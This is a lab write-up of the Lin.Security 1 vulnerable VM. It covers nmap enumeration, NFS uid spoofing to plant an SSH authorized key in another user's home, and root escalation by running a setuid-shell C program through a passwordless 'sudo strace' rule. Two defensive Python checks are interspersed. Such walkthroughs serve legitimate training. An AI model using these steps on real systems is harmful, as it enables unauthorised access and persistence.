Lin.Security 1
TARGET IP: 10.0.2.11
by sc00by
Given credentials:
user: bob
pass: secret
#####
nmap:
#####
root@kali:~/Documents/LinSecurity1#
nmap -sV -p- -vvv -n -sS 10.0.2.11
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-18 19:42 EDT
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 19:42
Scanning 10.0.2.11 [1 port]
Completed ARP Ping Scan at 19:42, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:42
Scanning 10.0.2.11 [65535 ports]
Discovered open port 22/tcp on 10.0.2.11
Discovered open port 111/tcp on 10.0.2.11
Discovered open port 42799/tcp on 10.0.2.11
Discovered open port 35245/tcp on 10.0.2.11
Discovered open port 56929/tcp on 10.0.2.11
Discovered open port 43193/tcp on 10.0.2.11
Discovered open port 2049/tcp on 10.0.2.11
Completed SYN Stealth Scan at 19:42, 3.48s elapsed (65535 total ports)
Initiating Service scan at 19:42
Scanning 7 services on 10.0.2.11
Completed Service scan at 19:42, 6.03s elapsed (7 services on 1 host)
NSE: Script scanning 10.0.2.11.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.05s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.06s elapsed
Nmap scan report for 10.0.2.11
Host is up, received arp-response (0.00013s latency).
Scanned at 2018-09-18 19:42:24 EDT for 10s
Not shown: 65528 closed ports
Reason: 65528 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
2049/tcp open nfs_acl syn-ack ttl 64 3 (RPC #100227)
35245/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
42799/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
43193/tcp open nlockmgr syn-ack ttl 64 1-4 (RPC #100021)
56929/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...
###########################
SSH into given credentials:
###########################
root@kali:~/Documents/LinSecurity1#
ssh bob@10.0.2.11
The authenticity of host '10.0.2.11 (10.0.2.11)' can't be established.
ECDSA key fingerprint is SHA256:I+wq8xJMlaf4EveLeaB70dPi9oP2lx9jUOcJ2Cx9ngQ.
Are you sure you want to continue connecting (yes/no)?
yes
Warning: Permanently added '10.0.2.11' (ECDSA) to the list of known hosts.
bob@10.0.2.11's password:
Welcome to lin.security | https://in.security | version 1.0
bob@linsecurity:~$
[~!~] Easy user ssh access to the box via given credentials!
#####################
Check for suid files:
#####################
bob@linsecurity:~$
find / -perm -u=s -type f 2>/dev/null
...
/bin/ping
/bin/fusermount
/bin/umount
/bin/ntfs-3g
/bin/su
/bin/mount
/usr/bin/pkexec
/usr/bin/netkit-rlogin
/usr/bin/xxd
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/netkit-rcp
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/netkit-rsh
/usr/bin/taskset
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/sbin/mount.nfs
#################################
Check for common vulnerabilities:
#################################
bob@linsecurity:~$
./les.sh
Available information:
Kernel version: 4.15.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 18.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
...
[+] [CVE-2009-1185] udev 2
Details: https://www.exploit-db.com/exploits/8478/
Download URL: https://www.exploit-db.com/download/8478
Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed
[~!~] Unfortunately this exploit led to nothing for us :[
... but there's always another way
#####################
Identify a new angle:
#####################
[~!~] Recall earlier:
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
2049/tcp open nfs_acl syn-ack ttl 64 3 (RPC #100227)
###########################
Check RPC services running:
###########################
bob@linsecurity:~/machinum/machinum$
rpcinfo -p 10.0.2.11
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100005 1 udp 44424 mountd
100005 1 tcp 56929 mountd
100005 2 udp 54096 mountd
100005 2 tcp 35245 mountd
100005 3 udp 55081 mountd
100005 3 tcp 42799 mountd
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 3 tcp 2049
100003 3 udp 2049 nfs
100227 3 udp 2049
100021 1 udp 44078 nlockmgr
100021 3 udp 44078 nlockmgr
100021 4 udp 44078 nlockmgr
100021 1 tcp 43193 nlockmgr
100021 3 tcp 43193 nlockmgr
100021 4 tcp 43193 nlockmgr
##################################
Setting up NFS on my kali machine:
##################################
root@kali:~/Documents/LinSecurity1#
showmount -e 10.0.2.11
Export list for 10.0.2.11:
/home/peter *
root@kali:~/Documents/LinSecurity1#
mkdir -p /nfs/general
root@kali:~/Documents/LinSecurity1#
mkdir -p /nfs/home
root@kali:~/Documents/LinSecurity1#
mkdir -p /nfs/linsec/peter
root@kali:/nfs/linsec/peter#
ls
root@kali:/nfs/linsec/peter#
ls -la
total 32
drwxr-xr-x 5 bob 1005 4096 Jul 10 15:49 .
drwxr-xr-x 3 root root 4096 Sep 18 21:00 ..
-rw-r--r-- 1 bob 1005 220 Jul 9 15:53 .bash_logout
-rw-r--r-- 1 bob 1005 3771 Jul 9 15:53 .bashrc
drwx------ 2 bob 1005 4096 Jul 10 06:04 .cache
-rw-rw-r-- 1 bob 1005 0 Jul 10 06:04 .cloud-locale-test.skip
drwx------ 3 bob 1005 4096 Jul 10 06:04 .gnupg
drwxrwxr-x 3 bob 1005 4096 Jul 10 04:03 .local
-rw-r--r-- 1 bob 1005 807 Jul 9 15:53 .profile
root@kali:/nfs/linsec/peter#
[~!~] Now that we have the NFS filesystem mounted on our Kali machine,
we should try to implement some sort of backdoor.
To do this we should mimic the uid of peter from
the target machine. We found this using machinum
earlier on:
uid=1001(peter)
bob@kali:~$
id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
[~!~] Oddly enough, I had a user named 'bob' that had 'uid=1001'
from a lab we did in Computer Security. Perhaps even
MORE oddly enough, he was able to access /nfs/linsec/peter
with no restrictions, whereas root@kali did not have r/w
access to the file system.
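The observation above is standard NFS behaviour rather than an oddity: with AUTH_SYS the server trusts whatever uid the client presents, and the default root_squash option only remaps uid 0, so a client user who happens to have peter's uid (1001) passes straight through while root is mapped to nobody. The following is an added example (not part of the original write-up) that models the exports(5) squash options and checks, for the /home/peter listing shown above (owner uid 1001, mode drwxr-xr-x), which client uids end up with write access; it assumes the default anonuid of 65534.

```python
import stat

ANON_UID_DEFAULT = 65534  # "nobody" on most Linux systems; exports(5) default anonuid


def parse_export_options(opts: str) -> dict:
    """Turn an exports(5) option string such as 'rw,sync,no_root_squash' into settings."""
    s = {"root_squash": True, "all_squash": False, "anonuid": ANON_UID_DEFAULT}
    for opt in (o.strip() for o in opts.split(",") if o.strip()):
        if opt == "no_root_squash":
            s["root_squash"] = False
        elif opt == "root_squash":
            s["root_squash"] = True
        elif opt == "all_squash":
            s["all_squash"] = True
        elif opt == "no_all_squash":
            s["all_squash"] = False
        elif opt.startswith("anonuid="):
            s["anonuid"] = int(opt.split("=", 1)[1])
    return s


def effective_server_uid(client_uid: int, opts: str) -> int:
    """uid the server uses for permission checks on a request sent as client_uid."""
    s = parse_export_options(opts)
    if s["all_squash"] or (client_uid == 0 and s["root_squash"]):
        return s["anonuid"]
    return client_uid  # AUTH_SYS: every other client uid is trusted as claimed


def can_write_dir(client_uid: int, opts: str, owner_uid: int, mode: int) -> bool:
    """Owner/other write check on a directory as the squashed uid (group bits ignored)."""
    uid = effective_server_uid(client_uid, opts)
    if uid == 0:
        return True
    if uid == owner_uid:
        return bool(mode & stat.S_IWUSR)
    return bool(mode & stat.S_IWOTH)


# Constructed from the listing above: /home/peter is owned by uid 1001, drwxr-xr-x
PETER_UID, PETER_HOME_MODE = 1001, 0o755

if __name__ == "__main__":
    for who, uid in (("root@kali", 0), ("bob@kali", 1001)):
        for opts in ("rw,sync", "rw,sync,all_squash"):
            print(who, opts, "writable:", can_write_dir(uid, opts, PETER_UID, PETER_HOME_MODE))
```

Exporting with all_squash (or restricting the export to specific hosts instead of `*`) is what closes the gap the write-up walks through.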
#######################################
Crafting a backdoor to peter's account:
#######################################
[~!~] When you have access to a user's file-system, but not an
SSH route, the first thing you would think of doing would
be to create an SSH key to form a handshake with the server
for persistence.
bob@kali:/nfs/linsec/peter$
ls -la
total 36
drwxr-xr-x 6 bob 1005 4096 Sep 18 21:20 .
drwxr-xr-x 3 root root 4096 Sep 18 21:00 ..
-rw-r--r-- 1 bob 1005 220 Jul 9 15:53 .bash_logout
-rw-r--r-- 1 bob 1005 3771 Jul 9 15:53 .bashrc
drwx------ 2 bob 1005 4096 Jul 10 06:04 .cache
-rw-rw-r-- 1 bob 1005 0 Jul 10 06:04 .cloud-locale-test.skip
drwx------ 3 bob 1005 4096 Jul 10 06:04 .gnupg
drwxrwxr-x 3 bob 1005 4096 Jul 10 04:03 .local
-rw-r--r-- 1 bob 1005 807 Jul 9 15:53 .profile
drwxr-xr-x 2 bob bob 4096 Sep 18 21:20 .ssh
bob@kali:/nfs/linsec/peter/.ssh$
ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/bob/.ssh/id_rsa): /nfs/linsec/peter/.ssh/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /nfs/linsec/peter/.ssh/id_rsa.
Your public key has been saved in /nfs/linsec/peter/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:g3v5UAMdt6t5QiotSF4Xc2WMp3Rw1Ag3Rri/fF7lHDo bob@kali
The key's randomart image is:
+---[RSA 2048]----+
| +O@o |
| .+O=o. |
| +.o=. |
| . =o . |
| . o S +.. ..|
| o o + * +. .oo|
| o + * +..E +|
| + o oo o. |
| . o. |
+----[SHA256]-----+
[~!~] SO NOW, in theory I have a way to get into peter's account
on the target machine, which will give me his permissions
to the whole machine's file system, not just the NFS.
bob@kali:/nfs/linsec/peter/.ssh$
cat id_rsa.pub > authorized_keys
bob@kali:/nfs/linsec/peter/.ssh$
ls
authorized_keys id_rsa id_rsa.pub
#########################
SSH into peter's account:
#########################
bob@kali:/nfs/linsec/peter/.ssh$
ssh -i id_rsa peter@10.0.2.11
Enter passphrase for key 'id_rsa':
Welcome to lin.security | https://in.security | version 1.0
peter@linsecurity:~$
#####################
Privilege Escalation:
#####################
[~!~] This took a lot of time, but I eventually learned of a new,
important way for me to enumerate system files that
I can execute as sudo without a password.
From `man sudo`:
    -l, --list  If no command is specified, list the allowed (and forbidden)
                commands for the invoking user (or the user specified by the
                -U option) on the current host. A longer list format is used
                if this option is specified multiple times and the security
                policy supports a verbose output format.
                If a command is specified and is permitted by the security
                policy, the fully-qualified path to the command is displayed
                along with any command line arguments. If command is specified
                but not allowed, sudo will exit with a status value of 1.
peter@linsecurity:~$
sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace
[~!~] `strace` is executable via sudo without a
sudo password!!!
From `man strace`:
NAME
strace - trace system calls and signals
Because sudo runs strace as root, and strace simply forks and
execs the program it is told to trace, that program runs as
root as well. This means we should be able to run a program
at sudo level using `strace`.
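From the defender's side, the rule that made this possible is the one line `sudo -l` prints under "may run the following commands". The following is an added example (not part of the original write-up) that parses that section of `sudo -l` output, constructed here from the output shown above, and lists the commands a user can run as root without re-authenticating so they can be reviewed against the sudoers policy.

```python
import re

# One rule line: "(runas_user[:runas_group]) [TAG:]... /path/cmd [args], /path/cmd2 ..."
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")


def parse_sudo_l(output: str) -> list[dict]:
    """Return one dict per command in the rules that follow the 'may run' line."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True  # everything before this is Defaults noise
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        tagset = {t.strip() for t in tags.split(":") if t.strip()}
        for cmd in (c.strip() for c in cmds.split(",") if c.strip()):
            rules.append({"runas": runas.split(":")[0].strip(),
                          "nopasswd": "NOPASSWD" in tagset,
                          "command": cmd})
    return rules


def risky_rules(output: str) -> list[str]:
    """Commands runnable as root (runas ALL or root) without a password."""
    return [r["command"] for r in parse_sudo_l(output)
            if r["nopasswd"] and r["runas"] in ("ALL", "root")]


# Constructed from the sudo -l output above (secure_path shortened)
SAMPLE = """Matching Defaults entries for peter on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin
User peter may run the following commands on linsecurity:
    (ALL) NOPASSWD: /usr/bin/strace
"""

if __name__ == "__main__":
    for cmd in risky_rules(SAMPLE):
        print("NOPASSWD root-level rule needs review:", cmd)
```

Any hit for a binary that can execute or trace other programs (strace here) should be treated as equivalent to an unrestricted root grant.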
#####################
Preparing an exploit:
#####################
gimmeroot.c:
------------------------------------------------------
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    // Set our id values to root
    setuid(0);
    setgid(0);
    // Spawn a shell with our new privs
    system("/bin/bash");
    return 0;
}
------------------------------------------------------
peter@linsecurity:~$
gcc gimmeroot.c
peter@linsecurity:~$
sudo strace ./a.out
execve("./a.out", ["./a.out"], 0x7fff74b580f0 /* 14 vars */) = 0
brk(NULL) = 0x5653000b4000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26254, ...}) = 0
mmap(NULL, 26254, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fb8137ee000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb8137ec000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fb8131dd000
mprotect(0x7fb8133c4000, 2097152, PROT_NONE) = 0
mmap(0x7fb8135c4000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7fb8135c4000
mmap(0x7fb8135ca000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fb8135ca000
close(3) = 0
arch_prctl(ARCH_SET_FS, 0x7fb8137ed4c0) = 0
mprotect(0x7fb8135c4000, 16384, PROT_READ) = 0
mprotect(0x5652ff92b000, 4096, PROT_READ) = 0
mprotect(0x7fb8137f5000, 4096, PROT_READ) = 0
munmap(0x7fb8137ee000, 26254) = 0
setuid(0) = 0
setgid(0) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fb81321bf20}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fb81321bf20}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
clone(child_stack=NULL, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0x7fff2f8b669c) = 19029
wait4(19029,
root@linsecurity:~#
sc00by was here
[~!~] WE GOT A ROOT SHELL!!! That's a win for us!
Thanks for reading!